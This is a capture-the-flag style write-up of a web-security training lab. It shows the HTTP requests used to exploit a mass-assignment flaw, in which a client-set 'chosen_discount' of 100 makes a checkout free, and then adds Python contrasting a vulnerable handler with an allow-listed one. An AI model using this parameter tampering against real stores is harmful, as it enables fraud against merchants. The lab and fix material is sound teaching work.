To solve the lab, you need to use an API attack to find an endpoint that lets you buy the Lightweight l33t Leather Jacket. You can log in with the credentials wiener:peter.

https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/

Solution

I'll log in to my account. Then I'll add the required item to the cart:

POST /cart HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

productId=1&redir=PRODUCT&quantity=1

A simple request. I'll try to place the order:

POST /cart HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

productId=1&redir=PRODUCT&quantity=

Response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 153

{"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":2,"item_price":133700}]}

OK, I see an interesting parameter: "chosen_discount":{"percentage":0}. What if I change it when placing the order?

POST /api/checkout HTTP/2
Host: 0a46003b0383e82c8002f36a00d800fc.web-security-academy.net
Cookie: session=nWRkAcVdJbEPb97h2aoNUy3qJKglGX8O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003b0383e82c8002f36a00d800fc.web-security-academy.net/cart
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
Content-Type: application/json; charset=utf-8
Content-Length: 155

{"chosen_discount":{"percentage":100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":2,"item_price":133700}]}

The order is placed with a great discount :)
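The server-side cause and its fix, as an added example that is not part of the original writeup or the lab's code: a handler that binds the whole JSON body to the order object accepts the client's chosen_discount, while an allow-listing handler takes only product_id and quantity and derives price and discount itself. The names CATALOG, bind_naive, bind_allowlisted and order_total are hypothetical.

```python
# Added example: two ways a backend could bind the /api/checkout JSON body.
# All function names and CATALOG are hypothetical; the lab's real code is not on the page.

CATALOG = {"1": 133700}  # constructed server-side price list; price taken from the response above

# Copy of the modified request body shown above.
TAMPERED = {
    "chosen_discount": {"percentage": 100},
    "chosen_products": [{"product_id": "1", "name": 'Lightweight "l33t" Leather Jacket',
                         "quantity": 2, "item_price": 133700}],
}

def order_total(order):
    """Total in the smallest currency unit after the percentage discount."""
    subtotal = sum(p["item_price"] * p["quantity"] for p in order["chosen_products"])
    return subtotal * (100 - order["chosen_discount"]["percentage"]) // 100

def bind_naive(body):
    """Vulnerable: every client-supplied field overwrites the server's order object."""
    order = {"chosen_discount": {"percentage": 0}, "chosen_products": []}
    order.update(body)  # mass assignment: chosen_discount comes from the client
    return order

def bind_allowlisted(body, session_discount=0):
    """Hardened: only product_id and quantity are read; price and discount are server-side."""
    unexpected = set(body) - {"chosen_products"}
    if unexpected:
        # Rejecting (and logging) unknown top-level fields also gives a detection signal.
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    products = []
    for item in body.get("chosen_products", []):
        pid, qty = str(item.get("product_id")), item.get("quantity")
        if pid not in CATALOG:
            raise ValueError("unknown product")
        if type(qty) is not int or not 1 <= qty <= 99:
            raise ValueError("bad quantity")
        # item_price and name sent by the client are ignored.
        products.append({"product_id": pid, "quantity": qty, "item_price": CATALOG[pid]})
    return {"chosen_discount": {"percentage": session_discount}, "chosen_products": products}

if __name__ == "__main__":
    print("naive total:", order_total(bind_naive(TAMPERED)))
    try:
        bind_allowlisted(TAMPERED)
    except ValueError as exc:
        print("hardened handler rejected request:", exc)
```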
